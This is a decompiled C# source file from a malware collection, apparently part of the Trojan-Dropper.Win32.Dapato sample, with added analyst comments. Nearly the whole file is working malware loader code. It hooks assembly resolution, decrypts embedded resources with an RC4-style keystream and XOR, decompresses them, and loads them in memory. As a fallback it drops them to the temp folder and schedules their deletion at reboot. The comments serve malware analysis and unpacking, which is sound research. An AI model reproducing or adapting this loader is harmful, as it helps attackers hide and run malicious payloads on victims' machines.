MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5/_000E.cs
2022-08-18 06:28:56 -05:00


// Decompiled with JetBrains decompiler
// Type: 
// Assembly: ss20, Version=1.1.1.1, Culture=neutral, PublicKeyToken=null
// MVID: 4385E1A7-2FA8-4895-8952-90E8ECDFEF6F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5.exe
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
internal static class \u000E
{
// Subscribes the resolver defined below to AppDomain.AssemblyResolve for the current
// AppDomain. From then on the CLR calls that handler for every assembly reference it
// could not bind itself, which is the hook the embedded-resource loader relies on.
// Analyst note: nothing is loaded here; loading happens lazily inside the handler.
internal static void \u0002() => AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u000E.\u0002);
// AssemblyResolve handler: maps a requested assembly name to a manifest resource embedded
// in this executable, optionally decodes it, and loads it as an assembly.
//
// _param0: event sender (unused). _param1: carries the requested assembly display name.
// Returns the loaded (or cached) Assembly, or null when the name is not in the table or
// the resource is missing.
//
// Reading aid: every `if (true) goto label_N;` jumps to a block at the bottom of the method
// that performs one assignment and jumps straight back. They add no logic; the effective
// order of execution is simply top to bottom, with those assignments inlined.
//
// Triage summary (from the code below):
//   * preferred path is Assembly.Load(byte[]), which leaves no file on disk;
//   * fallback path writes the decoded bytes to %TEMP%\<resource name>\<decoded file name>
//     and marks both file and directory for deletion at the next reboot.
[MethodImpl(MethodImplOptions.NoInlining)]
private static Assembly \u0002(object _param0, ResolveEventArgs _param1)
{
// Parse the requested name and rebuild it without the version part (argument false).
string str1 = new \u000E.\u0002(_param1.Name).\u0002(false);
if (true)
goto label_38;
label_1:
string s1;
// Lookup key = Base64 of the UTF-8 bytes of the version-less name.
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(s1));
if (true)
goto label_39;
label_2:
// String fetched by integer id from \u000F, a type not shown in this file.
// NOTE(review): presumably a string-decryption helper; the value is used below as a
// comma-separated lookup table - confirm against \u000F.
string str2 = \u000F.\u0002(-1181139859);
if (true)
goto label_40;
label_3:
string str3;
string str4 = str3;
char[] chArray1 = new char[1];
if (true)
goto label_41;
label_4:
char[] chArray2;
chArray2[0] = ',';
char[] chArray3 = chArray2;
// Split the table on ','; it is consumed below in groups of three fields.
string[] strArray1 = str4.Split(chArray3);
if (true)
goto label_42;
label_5:
// The next three jumps only initialise flag1, flag2 and flag3 to false.
if (true)
goto label_43;
label_6:
if (true)
goto label_44;
label_7:
if (true)
goto label_45;
label_8:
// str5: resource name to load; s2: Base64 of the file name used by the disk fallback.
string str5 = (string) null;
string s2 = (string) null;
string[] strArray2;
string str6;
bool flag1;
bool flag2;
bool flag3;
// Table layout per entry: [key, resource descriptor, Base64 file name].
for (int index = 0; index < strArray2.Length; index += 3)
{
if (strArray2[index].Equals(str6, StringComparison.Ordinal))
{
str5 = strArray2[index + 1];
s2 = strArray2[index + 2];
// Optional "<flags>|<resource name>" form: the text before '|' is a set of
// single-letter flags, the text after it is the real resource name.
int length = str5.IndexOf('|');
if (length >= 0)
{
string str7 = str5.Substring(0, length);
str5 = str5.Substring(length + 1);
// 'a' -> run the XOR/keystream decoder, 'b' -> run the Deflate unpacker,
// 'c' -> skip the in-memory load and go straight to the disk fallback.
flag1 = str7.IndexOf('a') != -1;
flag2 = str7.IndexOf('b') != -1;
flag3 = str7.IndexOf('c') != -1;
break;
}
break;
}
}
// Requested assembly is not one of the embedded ones: let normal resolution fail.
if (str5 == null)
return (Assembly) null;
// Cache keyed by resource name; the lock serialises concurrent resolve events.
Dictionary<string, Assembly> dictionary = \u000E.\u0003.\u0002;
Assembly assembly;
lock (dictionary)
{
if (!dictionary.TryGetValue(str5, out assembly))
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str5);
if (manifestResourceStream == null)
return (Assembly) null;
int length1 = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length1];
// Single Read call; its return value is ignored, so a short read is not detected.
manifestResourceStream.Read(numArray, 0, length1);
manifestResourceStream.Dispose();
// Decode order matters for unpacking the sample by hand: decrypt first, then inflate.
if (flag1)
numArray = \u000E.\u0003(numArray);
if (flag2)
numArray = \u000E.\u0002(numArray);
int length2 = numArray.Length;
// File name for the disk fallback, stored in the table as Base64 of UTF-8 text.
byte[] bytes = Convert.FromBase64String(s2);
string path2 = Encoding.UTF8.GetString(bytes, 0, bytes.Length);
if (!flag3)
{
try
{
// In-memory load: the decoded image never touches the file system on this path.
assembly = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
// Loader rejected the byte-array load: retry from a file on disk.
flag3 = true;
}
catch (BadImageFormatException ex)
{
flag3 = true;
}
}
if (flag3)
{
try
{
// Drop location: %TEMP%\<resource name>\<decoded file name>.
string str8 = Path.Combine(Path.GetTempPath(), str5);
Directory.CreateDirectory(str8);
string str9 = Path.Combine(str8, path2);
// An existing file at that path is reused as-is, without checking its content.
if (!File.Exists(str9))
{
Stream stream = (Stream) File.Create(str9);
stream.Write(numArray, 0, length2);
stream.Dispose();
try
{
// MoveFileEx(path, null, 4): 4 is MOVEFILE_DELAY_UNTIL_REBOOT; with a null
// destination Windows queues the path for deletion at the next restart
// (tracked in the Session Manager PendingFileRenameOperations value).
// Until that reboot the dropped file and directory remain on disk.
\u000E.\u0002(str9, (string) null, 4);
\u000E.\u0002(str8, (string) null, 4);
}
catch
{
// Failure to schedule the cleanup is deliberately ignored.
}
}
assembly = Assembly.LoadFrom(str9);
}
catch
{
// Every failure of the disk fallback is swallowed; assembly may stay null.
}
}
// Caches the result even when it is null, so a failed load is not retried.
dictionary.Add(str5, assembly);
}
}
return assembly;
// Assignment stubs targeted by the `if (true) goto` jumps above.
label_45:
flag3 = false;
goto label_8;
label_44:
flag2 = false;
goto label_7;
label_43:
flag1 = false;
goto label_6;
label_42:
strArray2 = strArray1;
goto label_5;
label_41:
chArray2 = chArray1;
goto label_4;
label_40:
str3 = str2;
goto label_3;
label_39:
str6 = base64String;
goto label_2;
label_38:
s1 = str1;
goto label_1;
}
// Reads a 32-bit integer from _param0 starting at offset _param1, using a scrambled
// (neither little- nor big-endian) byte order:
//   byte 0 -> bits 0-7, byte 2 -> bits 8-15, byte 3 -> bits 16-23, byte 1 -> bits 24-31.
// No bounds check is made; a buffer shorter than _param1 + 4 raises IndexOutOfRangeException.
private static int \u0002(byte[] _param0, int _param1)
{
byte[] numArray = _param0;
// Empty statement left by the obfuscator/decompiler; it has no effect.
if (true)
;
int index = _param1;
return (int) numArray[index] | (int) _param0[_param1 + 1] << 24 | (int) _param0[_param1 + 2] << 8 | (int) _param0[_param1 + 3] << 16;
}
// Unpacks a Deflate-compressed blob with an 8-byte header (the 'b' flag stage of the resolver).
//
// Header layout, both fields read with the scrambled byte order of the 4-byte reader above:
//   offset 0: magic, must equal -1686991929 (0x9B728BC7);
//   offset 4: length of the decompressed data;
//   offset 8: raw Deflate stream.
// Given that byte order, the magic appears in the buffer as the bytes C7 9B 8B 72, which can
// serve as a marker when carving decoded resources (it is only visible after the XOR stage
// if that stage was applied too).
//
// Returns a new array of the declared length. Throws a bare Exception on a bad magic.
// The `if (true) goto` jumps only perform the assignments at the bottom of the method.
private static byte[] \u0002(byte[] _param0)
{
int num1 = \u000E.\u0002(_param0, 0);
if (true)
goto label_6;
label_1:
int num2;
// Reject input that does not start with the expected magic value.
if (num2 != -1686991929)
throw new Exception();
int num3 = \u000E.\u0002(_param0, 4);
if (true)
goto label_7;
label_4:
// Read-only view over the input buffer.
MemoryStream memoryStream = new MemoryStream(_param0, false);
if (true)
goto label_8;
label_5:
Stream stream1;
// Skip the 8-byte header before inflating.
stream1.Position = 8L;
Stream stream2 = (Stream) new DeflateStream(stream1, CompressionMode.Decompress);
int count;
// Output size comes from the header and is not validated before allocating.
_param0 = new byte[count];
// Single Read call with the return value ignored: a partial read would leave the tail
// of the array zero-filled. Neither stream is disposed.
stream2.Read(_param0, 0, count);
return _param0;
label_8:
stream1 = (Stream) memoryStream;
goto label_5;
label_7:
count = num3;
goto label_4;
label_6:
num2 = num1;
goto label_1;
}
// Decodes a resource in place (the 'a' flag stage of the resolver) by XOR-ing every byte
// with a value built from a keystream byte and a small constant table.
//
// Key material: a Base64 string fetched by id from \u000F (type not shown here), decoded and
// then passed to \u0003\u2000.\u0002, also defined elsewhere.
// NOTE(review): whether that call transforms the key bytes in place cannot be seen from
// this file - confirm before re-implementing the decoder in an unpacking script.
//
// Returns the same array instance it was given, now holding the decoded bytes.
// The `if (true) goto` jumps only perform the assignments at the bottom of the method.
[MethodImpl(MethodImplOptions.NoInlining)]
private static byte[] \u0003(byte[] _param0)
{
string str = \u000F.\u0002(-1181139719);
if (true)
goto label_11;
label_1:
string s;
byte[] numArray1 = Convert.FromBase64String(s);
if (true)
goto label_12;
label_2:
byte[] numArray2;
\u0003\u2000.\u0002(numArray2);
// Keystream generator seeded with the key bytes (RC4-style state, see nested class \u0005).
\u000E.\u0005 obj1 = new \u000E.\u0005(numArray2);
if (true)
goto label_13;
label_3:
int length = _param0.Length;
// num1 counts bytes within the current 32-byte window.
byte num1 = 0;
// Initial value 121 is never used for non-empty input: num1 is 0 on the first
// iteration, so num2 is replaced by a keystream byte before the first XOR.
byte num2 = 121;
// Eight constants are declared, but both index expressions below are masked with
// `& 3`, so only the first four entries are ever read.
byte[] numArray3 = new byte[8]
{
(byte) 148,
(byte) 68,
(byte) 208,
(byte) 52,
(byte) 241,
(byte) 93,
(byte) 195,
(byte) 220
};
\u000E.\u0005 obj2;
for (int index = 0; index != length; ++index)
{
// A fresh keystream byte is drawn once every 32 input bytes.
if (num1 == (byte) 0)
num2 = obj2.\u0002();
++num1;
if (num1 == (byte) 32)
num1 = (byte) 0;
// Mask = keystream byte ^ table[(index >> 2) & 3] ^ table[num1 & 3].
_param0[index] ^= (byte) ((uint) num2 ^ (uint) numArray3[index >> 2 & 3] ^ (uint) numArray3[(int) num1 & 3]);
}
return _param0;
label_13:
obj2 = obj1;
goto label_3;
label_12:
numArray2 = numArray1;
goto label_2;
label_11:
s = str;
goto label_1;
}
// P/Invoke binding for kernel32!MoveFileEx: (existing path, new path, flags).
// The only caller in this file passes a null new path and flags = 4
// (MOVEFILE_DELAY_UNTIL_REBOOT), i.e. it uses the API to schedule deletion at reboot
// rather than to move anything. The obfuscated name hides the import from a quick
// source read, but the DllImport entry point is still visible in the assembly metadata.
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
private static extern bool \u0002(string _param0, string _param1, int _param2);
// Parsed form of an assembly display name: a simple name, a version and two further
// string attributes. All literal prefixes and default values come from \u000F.\u0002(id),
// a lookup defined in another type.
// NOTE(review): from the usual "Name, Version=..., Culture=..., PublicKeyToken=..." layout,
// \u0005 is presumably the culture and \u0008 the public key token - confirm by resolving
// the string ids.
private struct \u0002
{
// Version component; stays at new Version() when the input has none.
public Version \u0002;
// Simple name: the last comma-separated part that matched none of the known prefixes.
public string \u0003;
// Attribute value, or null when absent or equal to its default string.
public string \u0005;
// Attribute value, or null when absent or equal to its default string.
public string \u0008;
// Splits _param1 on ',' and sorts each trimmed part into the fields above.
// The `if (true) goto` jumps only run the field initialisers at the bottom.
public \u0002(string _param1)
{
Version version = new Version();
if (true)
goto label_15;
label_1:
string empty = string.Empty;
if (true)
goto label_16;
label_2:
if (true)
goto label_17;
label_3:
this.\u0008 = (string) null;
string str1 = _param1;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
// Part starting with the first prefix: the remainder is parsed as a Version.
if (str3.StartsWith(\u000F.\u0002(-1181139052), StringComparison.Ordinal))
this.\u0002 = new Version(str3.Substring(\u000F.\u0002(-1181139052).Length));
else if (str3.StartsWith(\u000F.\u0002(-1181138971), StringComparison.Ordinal))
{
this.\u0005 = str3.Substring(\u000F.\u0002(-1181138971).Length);
// Normalise the default value to null so it compares equal to "absent".
if (this.\u0005 == \u000F.\u0002(-1181138954))
this.\u0005 = (string) null;
}
else if (str3.StartsWith(\u000F.\u0002(-1181139000), StringComparison.Ordinal))
{
this.\u0008 = str3.Substring(\u000F.\u0002(-1181139000).Length);
// Same normalisation for the second attribute.
if (this.\u0008 == \u000F.\u0002(-1181138990))
this.\u0008 = (string) null;
}
else
// Anything without a known prefix is taken as the simple name.
this.\u0003 = str3;
}
return;
label_17:
this.\u0005 = (string) null;
goto label_3;
label_16:
this.\u0003 = empty;
goto label_2;
label_15:
this.\u0002 = version;
goto label_1;
}
// Rebuilds a canonical display name from the fields: the simple name, then the version
// only when _param1 is true, then both attributes with their default strings substituted
// for null. The resolver calls this with false, so lookups ignore the version.
public string \u0002(bool _param1)
{
StringBuilder stringBuilder1 = new StringBuilder();
if (true)
goto label_4;
label_1:
StringBuilder stringBuilder2;
stringBuilder2.Append(this.\u0003);
if (_param1)
stringBuilder2.Append(\u000F.\u0002(-1181139929)).Append((object) this.\u0002);
stringBuilder2.Append(\u000F.\u0002(-1181139914)).Append(this.\u0005 ?? \u000F.\u0002(-1181138954)).Append(\u000F.\u0002(-1181139963)).Append(this.\u0008 ?? \u000F.\u0002(-1181138990));
return stringBuilder2.ToString();
label_4:
stringBuilder2 = stringBuilder1;
goto label_1;
}
}
// Holder for the resolver's cache of already-loaded embedded assemblies.
// Being a separate nested static class, the dictionary is created on first access.
private static class \u0003
{
// Resource name -> loaded Assembly (the resolver also stores null for failed loads).
// Keys are compared ordinally; the resolver locks on this instance while using it.
internal static readonly Dictionary<string, Assembly> \u0002;
static \u0003()
{
Dictionary<string, Assembly> dictionary = new Dictionary<string, Assembly>((IEqualityComparer<string>) StringComparer.Ordinal);
// Dead branch (condition is constant false); the assignment below always runs.
if (false)
return;
\u000E.\u0003.\u0002 = dictionary;
}
}
// Keystream generator with an RC4-style 256-byte state: the constructor runs the RC4 key
// schedule and \u0002() yields one output byte per call.
// Difference from textbook RC4 that matters when re-implementing it for unpacking: the two
// indices are NOT reset after the key schedule. The first index is left at 256 (wrapping to
// 1 on the first output call) and the second keeps its final key-schedule value.
private sealed class \u0005
{
// 256-byte permutation state.
private byte[] \u0002;
// First state index ("i").
private int \u0003;
// Second state index ("j").
private int \u0005;
// Builds the state from the key bytes in _param1. An empty key makes the
// `% num` below divide by zero. The `if (true) goto` jumps only run the
// assignments at the bottom of the constructor.
public \u0005(byte[] _param1)
{
byte[] numArray = new byte[256];
if (true)
goto label_9;
label_1:
// ISSUE: explicit constructor call
base.\u002Ector();
int length = _param1.Length;
if (true)
goto label_10;
label_2:
if (true)
goto label_11;
label_5:
// Identity permutation: state[i] = i.
for (; this.\u0003 < 256; ++this.\u0003)
this.\u0002[this.\u0003] = (byte) this.\u0003;
int num;
// Key schedule: j = (j + key[i mod keylen] + state[i]) & 0xFF, then swap state[i], state[j].
for (this.\u0003 = this.\u0005 = 0; this.\u0003 < 256; ++this.\u0003)
{
this.\u0005 = this.\u0005 + (int) _param1[this.\u0003 % num] + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
this.\u0002(this.\u0003, this.\u0005);
}
return;
label_11:
this.\u0003 = 0;
goto label_5;
label_10:
num = length;
goto label_2;
label_9:
this.\u0002 = numArray;
goto label_1;
}
// Swaps the state bytes at positions _param1 and _param2.
private void \u0002(int _param1, int _param2)
{
int num1 = (int) this.\u0002[_param1];
if (true)
goto label_2;
label_1:
this.\u0002[_param1] = this.\u0002[_param2];
byte num2;
this.\u0002[_param2] = num2;
return;
label_2:
num2 = (byte) num1;
goto label_1;
}
// Produces the next keystream byte: i = (i + 1) & 0xFF, j = (j + state[i]) & 0xFF,
// swap state[i] and state[j], return state[(state[i] + state[j]) mod 256].
public byte \u0002()
{
int num1 = this.\u0003 + 1 & (int) byte.MaxValue;
if (true)
goto label_3;
label_1:
int num2 = this.\u0005 + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue;
if (true)
goto label_4;
label_2:
this.\u0002(this.\u0003, this.\u0005);
// The (byte) cast performs the modulo-256 wrap of the index sum.
return this.\u0002[(int) (byte) ((uint) this.\u0002[this.\u0003] + (uint) this.\u0002[this.\u0005])];
label_4:
this.\u0005 = num2;
goto label_2;
label_3:
this.\u0003 = num1;
goto label_1;
}
}
}